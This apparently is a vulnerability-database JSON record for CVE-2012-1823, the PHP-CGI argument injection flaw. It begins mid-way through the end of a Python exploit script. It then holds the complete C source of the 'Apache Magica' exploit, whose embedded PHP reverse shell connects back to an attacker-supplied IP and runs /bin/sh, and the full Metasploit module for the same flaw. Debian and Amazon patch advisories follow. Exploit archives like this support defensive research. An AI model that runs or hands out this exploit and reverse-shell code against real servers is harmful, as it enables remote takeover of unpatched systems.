w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n wr1te_fil3(args, vu1nz)\r\n\r\n return\r\n\r\n\r\ndef m41n():\r\n if __name__ == \"__main__\":\r\n print \"--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--\"\r\n c0ntr0ller()\r\n else:\r\n print \"[-] 3rr0r: y0u fuck3d up dud3\"\r\n sys.exit(1)\r\n print \"[+] h0p3 1t h3lp3d\"\r\n\r\n\r\n# \\o/ fr33 requiem 1337 h4x0rs ... \r\nm41n()\r\n\r\n# e0F", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29316/"}, {"lastseen": "2016-02-03T09:58:57", "description": "Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for linux platform", "published": "2013-10-29T00:00:00", "type": "exploitdb", "title": "Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-10-29T00:00:00", "id": "EDB-ID:29290", "href": "https://www.exploit-db.com/exploits/29290/", "sourceData": "/* Apache Magica by Kingcope */\r\n/* gcc apache-magika.c -o apache-magika -lssl */\r\n/* This is a code execution bug in the combination of Apache and PHP.\r\nOn Debian and Ubuntu the vulnerability is present in the default install\r\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\r\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\r\n/cgi-bin/php5 and /cgi-bin/php. 
The vulnerability makes it possible to execute\r\nthe binary because this binary has a security check enabled when installed with\r\nApache http server and this security check is circumvented by the exploit.\r\nWhen accessing the php-cgi binary the security check will block the request and\r\nwill not execute the binary.\r\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\r\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\r\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\r\nThis makes it possible to execute the binary bypassing the Security check by\r\nsetting these two php.ini settings.\r\nPrior to this code for the Security check getopt is called and it is possible\r\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\r\n-d switch. If both values are set to zero and the request is sent to the server\r\nphp-cgi gets fully executed and we can use the payload in the POST data field\r\nto execute arbitrary php and therefore we can execute programs on the system.\r\napache-magika.c is an exploit that does exactly the prior described. It does\r\nsupport SSL.\r\n/* Affected and tested versions\r\nPHP 5.3.10\r\nPHP 5.3.8-1\r\nPHP 5.3.6-13\r\nPHP 5.3.3\r\nPHP 5.2.17\r\nPHP 5.2.11\r\nPHP 5.2.6-3\r\nPHP 5.2.6+lenny16 with Suhosin-Patch\r\nAffected versions\r\nPHP prior to 5.3.12\r\nPHP prior to 5.4.2\r\nUnaffected versions\r\nPHP 4 - getopt parser unexploitable\r\nPHP 5.3.12 and up\r\nPHP 5.4.2 and up\r\nUnaffected versions are patched by CVE-2012-1823.\r\n*/\r\n/* .\r\n /'\\rrq rk\r\n . 
// \\\\ .\r\n.x.//fco\\\\-|-\r\n '//cmtco\\\\zt\r\n //6meqrg.\\\\tq\r\n//_________\\\\'\r\nEJPGQO\r\napache-magica.c by Kingcope\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <sys/types.h>\r\n#include <stddef.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\ntypedef struct {\r\n\tint sockfd;\r\n\tSSL *handle;\r\n\tSSL_CTX *ctx;\r\n} connection;\r\n\r\nvoid usage(char *argv[])\r\n{\r\n printf(\"usage: %s <--target target> <--port port> <--protocol http|https> \" \\\r\n \"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\\n\",\r\n argv[0]);\r\n exit(1);\r\n}\r\n\r\nchar poststr[] = \"POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F\" \\\r\n \"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64\" \\\r\n \"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73\" \\\r\n \"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E\" \\\r\n \"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63\" \\\r\n \"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62\" \\\r\n \"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74\" \\\r\n \"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68\" \\\r\n \"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F\" \\\r\n \"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63\" \\\r\n \"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73\" \\\r\n \"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n\" \\\r\n \"Host: %s\\r\\n\" \\\r\n \"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26\" \\\r\n \"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n\" \\\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \\\r\n \"Content-Length: 
%d\\r\\n\" \\\r\n \"Connection: close\\r\\n\\r\\n%s\";\r\nchar phpstr[] = \"<?php\\n\" \\\r\n\"set_time_limit(0);\\n\" \\\r\n\"$ip = '%s';\\n\" \\\r\n\"$port = %d;\\n\" \\\r\n\"$chunk_size = 1400;\\n\" \\\r\n\"$write_a = null;\\n\" \\\r\n\"$error_a = null;\\n\" \\\r\n\"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n\" \\\r\n\"$daemon = 0;\\n\" \\\r\n\"$debug = 0;\\n\" \\\r\n\"if (function_exists('pcntl_fork')) {\\n\" \\\r\n\"\t$pid = pcntl_fork();\t\\n\" \\\r\n\"\tif ($pid == -1) {\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Can't fork\\\");\\n\" \\\r\n\"\t\texit(1);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif ($pid) {\\n\" \\\r\n\"\t\texit(0);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (posix_setsid() == -1) {\\n\" \\\r\n\"\t\tprintit(\\\"Error: Can't setsid()\\\");\\n\" \\\r\n\"\t\texit(1);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\t$daemon = 1;\\n\" \\\r\n\"} else {\\n\" \\\r\n\"\tprintit(\\\"WARNING: Failed to daemonise.\\\");\\n\" \\\r\n\"}\\n\" \\\r\n\"chdir(\\\"/\\\");\\n\" \\\r\n\"umask(0);\\n\" \\\r\n\"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n\" \\\r\n\"if (!$sock) {\\n\" \\\r\n\"\tprintit(\\\"$errstr ($errno)\\\");\\n\" \\\r\n\"\texit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"$descriptorspec = array(\\n\" \\\r\n\" 0 => array(\\\"pipe\\\", \\\"r\\\"),\\n\" \\\r\n\" 1 => array(\\\"pipe\\\", \\\"w\\\"),\\n\" \\\r\n\" 2 => array(\\\"pipe\\\", \\\"w\\\")\\n\" \\\r\n\");\\n\" \\\r\n\"$process = proc_open($shell, $descriptorspec, $pipes);\\n\" \\\r\n\"if (!is_resource($process)) {\\n\" \\\r\n\"\tprintit(\\\"ERROR: Can't spawn shell\\\");\\n\" \\\r\n\"\texit(1);\\n\" \\\r\n\"}\\n\" \\\r\n\"stream_set_blocking($pipes[0], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[1], 0);\\n\" \\\r\n\"stream_set_blocking($pipes[2], 0);\\n\" \\\r\n\"stream_set_blocking($sock, 0);\\n\" \\\r\n\"while (1) {\\n\" \\\r\n\"\tif (feof($sock)) {\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Shell connection terminated\\\");\\n\" \\\r\n\"\t\tbreak;\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (feof($pipes[1])) 
{\\n\" \\\r\n\"\t\tprintit(\\\"ERROR: Shell process terminated\\\");\\n\" \\\r\n\"\t\tbreak;\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n\" \\\r\n\"\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n\" \\\r\n\"\tif (in_array($sock, $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"SOCK READ\\\");\\n\" \\\r\n\"\t\t$input = fread($sock, $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"SOCK: $input\\\");\\n\" \\\r\n\"\t\tfwrite($pipes[0], $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (in_array($pipes[1], $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDOUT READ\\\");\\n\" \\\r\n\"\t\t$input = fread($pipes[1], $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDOUT: $input\\\");\\n\" \\\r\n\"\t\tfwrite($sock, $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"\tif (in_array($pipes[2], $read_a)) {\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDERR READ\\\");\\n\" \\\r\n\"\t\t$input = fread($pipes[2], $chunk_size);\\n\" \\\r\n\"\t\tif ($debug) printit(\\\"STDERR: $input\\\");\\n\" \\\r\n\"\t\tfwrite($sock, $input);\\n\" \\\r\n\"\t}\\n\" \\\r\n\"}\\n\" \\\r\n\"\\n\" \\\r\n\"fclose($sock);\\n\" \\\r\n\"fclose($pipes[0]);\\n\" \\\r\n\"fclose($pipes[1]);\\n\" \\\r\n\"fclose($pipes[2]);\\n\" \\\r\n\"proc_close($process);\\n\" \\\r\n\"function printit ($string) {\\n\" \\\r\n\"\tif (!$daemon) {\\n\" \\\r\n\"\t\tprint \\\"$string\\n\\\";\\n\" \\\r\n\"\t}\\n\" \\\r\n\"}\\n\" \\\r\n\"exit(1);\\n\" \\\r\n\"?>\";\r\n\r\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\r\n{\r\n struct hostent *he;\r\n struct sockaddr_in server, *servercopy;\r\n \r\n if ((he=gethostbyname(hostname)) == NULL) {\r\n printf(\"Hostname cannot be resolved\\n\");\r\n exit(255);\r\n }\r\n \r\n servercopy = malloc(sizeof(struct sockaddr_in));\r\n if (!servercopy) {\r\n\tprintf(\"malloc error (1)\\n\");\r\n\texit(255);\r\n }\r\n memset(&server, '\\0', sizeof(struct sockaddr_in));\r\n memcpy(&server.sin_addr, 
he->h_addr_list[0], he->h_length);\r\n server.sin_family = AF_INET;\r\n server.sin_port = htons(port);\r\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\r\n return servercopy;\r\n}\r\n\r\nchar *sslread(connection *c)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = SSL_read(c->handle, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nchar *read_(int sockfd)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = read(sockfd, &ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 > 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\r\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\r\n char httpsflag=0;\r\n unsigned short port=0, reverseport=0;\r\n struct sockaddr_in *server;\r\n int sockfd;\r\n unsigned int writesize, tmpsize;\r\n unsigned int i;\r\n connection *sslconnection;\r\n printf(\"-== Apache Magika by Kingcope ==-\\n\");\r\n for(;;)\r\n {\r\n\t int c;\r\n int option_index=0;\r\n static struct option long_options[] = {\r\n\t {\"target\", required_argument, 0, 0 },\r\n\t {\"port\", required_argument, 0, 0 },\r\n\t {\"protocol\", required_argument, 0, 0 },\r\n\t {\"reverse-ip\", required_argument, 0, 0 },\r\n\t {\"reverse-port\", required_argument, 0, 0 },\r\n\t {\"force-interpreter\", 
required_argument, 0, 0 },\t \r\n\t {0, 0, 0, 0 }\r\n\t };\r\n\t \r\n\t c = getopt_long(argc, argv, \"\", long_options, &option_index);\r\n if (c < 0)\r\n \tbreak;\r\n \r\n switch (c) {\r\n\t case 0:\r\n\t switch (option_index) {\r\n\t case 0:\r\n\t if (optarg) {\r\n\t target = calloc(strlen(optarg)+1, sizeof(char));\r\n\t if (!target) {\r\n\t\t printf(\"calloc error (2)\\n\");\r\n\t exit(255);\r\n }\r\n\t memcpy(target, optarg, strlen(optarg)+1);\r\n \t}\r\n break;\r\n case 1:\r\n if(optarg)\r\n\t port = atoi(optarg);\r\n break;\r\n case 2:\r\n protocol = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!protocol) {\r\n\t printf(\"calloc error (3)\\n\");\r\n exit(255);\r\n }\r\n memcpy(protocol, optarg, strlen(optarg)+1);\r\n if (!strcmp(protocol, \"https\"))\r\n httpsflag=1;\r\n break;\r\n case 3:\r\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseip) {\r\n\t printf(\"calloc error (4)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseip, optarg, strlen(optarg)+1); \r\n break;\r\n case 4:\r\n\t reverseport = atoi(optarg); \r\n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseportstr) {\r\n\t printf(\"calloc error (5)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \r\n break;\r\n case 5:\r\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!forceinterpreter) {\r\n\t printf(\"calloc error (6)\\n\");\r\n exit(255);\r\n }\r\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \r\n break;\r\n default:\r\n usage(argv);\r\n\t }\r\n\t break;\r\n\t \r\n\t default:\r\n\t usage(argv);\r\n }\r\n }\r\n\r\n if ((optind < argc) || !target || !protocol || !port ||\r\n !reverseip || !reverseport){\r\n\tusage(argv);\r\n }\r\n \r\n server = gethostbyname_(target, port);\r\n if (!server) {\r\n printf(\"Error while resolving hostname. 
(7)\\n\");\r\n exit(255);\r\n }\r\n\r\n char *interpreters[5];\r\n int ninterpreters = 5;\r\n interpreters[0] = strdup(\"/cgi-bin/php\");\r\n interpreters[1] = strdup(\"/cgi-bin/php5\");\r\n interpreters[2] = strdup(\"/cgi-bin/php-cgi\");\r\n interpreters[3] = strdup(\"/cgi-bin/php.cgi\");\r\n interpreters[4] = strdup(\"/cgi-bin/php4\");\r\n \r\n for (i=0;i<ninterpreters;i++) {\r\n interpreter = interpreters[i];\r\n if (forceinterpreter) {\r\n interpreter = strdup(forceinterpreter);\r\n }\r\n if (forceinterpreter && i)\r\n break;\r\n printf(\"%s\\n\", interpreter);\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sockfd < 1) { \r\n\t printf(\"socket error (8)\\n\");\r\n\t exit(255);\r\n }\r\n \r\n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {\r\n printf(\"connect error (9)\\n\");\r\n exit(255);\t \r\n }\r\n if (httpsflag) {\r\n sslconnection = (connection*) malloc(sizeof(connection));\r\n if (!sslconnection) {\r\n printf(\"malloc error (10)\\n\");\r\n exit(255); \r\n }\r\n sslconnection->handle = NULL;\r\n sslconnection->ctx = NULL;\r\n\r\n SSL_library_init();\r\n\r\n sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());\r\n if (!sslconnection->ctx) {\r\n \t printf(\"SSL_CTX_new error (11)\\n\");\r\n exit(255);\r\n }\r\n\r\n sslconnection->handle = SSL_new(sslconnection->ctx);\r\n if (!sslconnection->handle) {\r\n \t printf(\"SSL_new error (12)\\n\");\r\n\t exit(255); \r\n }\r\n if (!SSL_set_fd(sslconnection->handle, sockfd)) {\r\n \t printf(\"SSL_set_fd error (13)\\n\");\r\n exit(255);\r\n }\r\n \r\n if (SSL_connect(sslconnection->handle) != 1) {\r\n\t printf(\"SSL_connect error (14)\\n\");\r\n exit(255); \r\n }\r\n }\r\n \r\n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\r\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\r\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\r\n \r\n writesize = strlen(target) + strlen(interpreter) + \r\n strlen(poststr) + strlen(tmpstr) + 64;\r\n 
writestr = (char*)calloc(writesize, sizeof(char));\r\n snprintf(writestr, writesize, poststr, interpreter,\r\n target, strlen(tmpstr), tmpstr);\r\n \r\n if (!httpsflag) {\r\n\t write(sockfd, writestr, strlen(writestr));\r\n\t readbuf = read_(sockfd);\r\n } else {\r\n\t SSL_write(sslconnection->handle, writestr, strlen(writestr));\r\n\t readbuf = sslread(sslconnection);\r\n }\r\n \r\n if (readbuf) {\r\n printf(\"***SERVER RESPONSE***\\n\\n%s\\n\\n\", readbuf); \r\n } else {\r\n printf(\"read error (15)\\n\");\r\n exit(255);\t \r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29290/"}], "debian": [{"lastseen": "2020-11-11T13:12:54", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2465-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMay 09, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1172 CVE-2012-1823 CVE-2012-2311\n\nDe Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload\nname which lead to corrupted $_FILES indices.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.3.3-7+squeeze9.\n\nThe testing distribution (wheezy) will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 5.4.3-1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system 
and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-05-09T17:31:18", "published": "2012-05-09T17:31:18", "id": "DEBIAN:DSA-2465-1:8EF31", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00100.html", "title": "[SECURITY] [DSA 2465-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-13T00:16:42", "description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: \"if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the \"encoded in a system-defined manner\" from the RFC) and then passes them to the CGI binary.\" This module can also be used to exploit the plesk 0day disclosed by kingcope and exploited in the wild in June 2013.\n", "published": "2012-05-04T23:32:32", "type": "metasploit", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP CGI Argument Injection',\n 'Description' => %q{\n When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n an argument injection vulnerability.
This module takes advantage of\n the -d flag to set php.ini directives to achieve code execution.\n From the advisory: \"if there is NO unescaped '=' in the query string,\n the string is split on '+' (encoded space) characters, urldecoded,\n passed to a function that escapes shell metacharacters (the \"encoded in\n a system-defined manner\" from the RFC) and then passes them to the CGI\n binary.\" This module can also be used to exploit the plesk 0day disclosed\n by kingcope and exploited in the wild on June 2013.\n },\n 'Author' =>\n [\n 'egypt', 'hdm', #original msf exploit\n 'jjarmoc', #added URI encoding obfuscation\n 'kingcope', #plesk poc\n 'juan vazquez' #add support for plesk exploitation\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'CVE', '2012-1823' ],\n [ 'OSVDB', '81633'],\n [ 'OSVDB', '93979'],\n [ 'EDB', '25986'],\n [ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],\n [ 'URL', 'http://kb.parallels.com/en/116241']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n # Arbitrary big number. 
The payload gets sent as an HTTP\n # response body, so really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'DisclosureDate' => '2012-05-03',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]),\n OptInt.new('URIENCODING', [true, \"Level of URI URIENCODING and padding (0 for minimum)\",0]),\n OptBool.new('PLESK', [true, \"Exploit Plesk\", false]),\n ])\n end\n\n # php-cgi -h\n # ...\n # -s Display colour syntax highlighted source.\n def check\n\n vprint_status(\"Checking uri #{uri}\")\n\n response = send_request_raw({ 'uri' => uri })\n\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi and not datastore['PLESK']\n vprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\")\n return Exploit::CheckCode::Unknown\n end\n\n response = send_request_raw({ 'uri' => uri + \"?#{create_arg(\"-s\")}\"})\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi\n return Exploit::CheckCode::Vulnerable\n end\n\n if datastore['PLESK'] and response and response.code == 500\n return Exploit::CheckCode::Appears\n end\n\n vprint_error(\"Server responded indicating it was not vulnerable\")\n return Exploit::CheckCode::Safe\n end\n\n def uri\n if datastore['PLESK']\n normalize_uri(\"phppath\", \"php\")\n else\n normalize_uri(target_uri.path).gsub(/\\?.*/, \"\")\n end\n end\n\n def uri_encoding_level\n if datastore['PLESK']\n return 0\n else\n return datastore['URIENCODING']\n end\n end\n\n def exploit\n begin\n args = [\n rand_spaces(),\n create_arg(\"-d\",\"allow_url_include=#{rand_php_ini_true}\"),\n create_arg(\"-d\",\"safe_mode=#{rand_php_ini_false}\"),\n create_arg(\"-d\",\"suhosin.simulation=#{rand_php_ini_true}\"),\n create_arg(\"-d\",'disable_functions=\"\"'),\n 
create_arg(\"-d\",\"open_basedir=none\"),\n create_arg(\"-d\",\"auto_prepend_file=php://input\"),\n create_arg(\"-d\", \"cgi.force_redirect=#{rand_php_ini_false}\"),\n create_arg(\"-d\", \"cgi.redirect_status_env=0\"),\n rand_opt_equiv(\"-n\")\n ]\n\n qs = args.join()\n\n # Has to be all on one line, so gsub out the comments and the newlines\n payload_oneline = \"<?php \" + payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\")\n response = send_request_cgi( {\n 'method' => \"POST\",\n 'global' => true,\n 'uri' => \"#{uri}?#{qs}\",\n 'data' => payload_oneline,\n }, 0.5)\n handler\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\n print_error(\"The target service unreachable\")\n rescue ::OpenSSL::SSL::SSLError\n print_error(\"The target failed to negotiate SSL, is this really an SSL service?\")\n end\n\n end\n\n def create_arg(arg, val = nil)\n if val\n val = rand_encode(val)\n val.gsub!('=','%3d') # = must always be encoded\n val.gsub!('\"','%22') # \" too\n end\n\n ret = ''\n ret << \"#{rand_spaces}\"\n ret << \"#{rand_opt_equiv(arg)}\"\n ret << \"#{rand_space}\"\n ret << \"#{rand_spaces}\"\n ret << \"#{val}\"\n ret << \"#{rand_space}\"\n end\n\n def rand_opt_equiv(opt)\n # Returns a random equivilant option from mapping at\n # http://www.php.net/manual/en/features.commandline.options.php\n opt_equivs = {\n \"-d\" => [\n \"#{rand_dash}#{rand_encode(\"d\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"define\")}\"\n ],\n \"-s\" => [\n \"#{rand_dash}#{rand_encode(\"s\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlight\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlighting\")}\"\n ],\n \"-T\" => [\n \"#{rand_dash}#{rand_encode(\"T\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"timing\")}\"\n ],\n \"-n\" => [\n \"#{rand_dash}#{rand_encode(\"n\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"no-php-ini\")}\"\n ]\n }\n\n equivs = opt_equivs[opt]\n equivs ? 
equivs[rand(opt_equivs[opt].length)] : opt\n\n end\n\n def rand_encode(string, max = string.length)\n # Randomly URI encode characters from string, up to max times.\n chars = [];\n if max > uri_encoding_level then max = uri_encoding_level end\n if string.length == 1\n if rand(2) > 0\n chars << 0\n end\n else\n if max > 0\n max.times { chars << rand(string.length)}\n end\n end\n chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], \"hex-noslashes\")}\n string\n end\n\n def rand_spaces(num = uri_encoding_level)\n ret = ''\n num.times {\n ret << rand_space\n }\n ret\n end\n\n def rand_space\n uri_encoding_level > 0 ? [\"%20\",\"%09\",\"+\"][rand(3)] : \"+\"\n end\n\n def rand_dash\n uri_encoding_level > 0 ? [\"-\",\"%2d\",\"%2D\"][rand(3)] : \"-\"\n end\n\n def rand_php_ini_false\n Rex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)])\n end\n\n def rand_php_ini_true\n Rex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)])\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/php_cgi_arg_injection.rb"}], "amazon": [{"lastseen": "2020-11-10T12:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "**Issue Overview:**\n\nA flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. 
([CVE-2012-1823 __](<https://access.redhat.com/security/cve/CVE-2012-1823>))\n\n \n**Affected Packages:** \n\n\nphp\n\n \n**Issue Correction:** \nRun _yum update php_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php-dba-5.3.13-1.20.amzn1.i686 \n php-process-5.3.13-1.20.amzn1.i686 \n php-mysql-5.3.13-1.20.amzn1.i686 \n php-xml-5.3.13-1.20.amzn1.i686 \n php-pdo-5.3.13-1.20.amzn1.i686 \n php-snmp-5.3.13-1.20.amzn1.i686 \n php-mbstring-5.3.13-1.20.amzn1.i686 \n php-devel-5.3.13-1.20.amzn1.i686 \n php-xmlrpc-5.3.13-1.20.amzn1.i686 \n php-mssql-5.3.13-1.20.amzn1.i686 \n php-soap-5.3.13-1.20.amzn1.i686 \n php-odbc-5.3.13-1.20.amzn1.i686 \n php-bcmath-5.3.13-1.20.amzn1.i686 \n php-5.3.13-1.20.amzn1.i686 \n php-mcrypt-5.3.13-1.20.amzn1.i686 \n php-tidy-5.3.13-1.20.amzn1.i686 \n php-debuginfo-5.3.13-1.20.amzn1.i686 \n 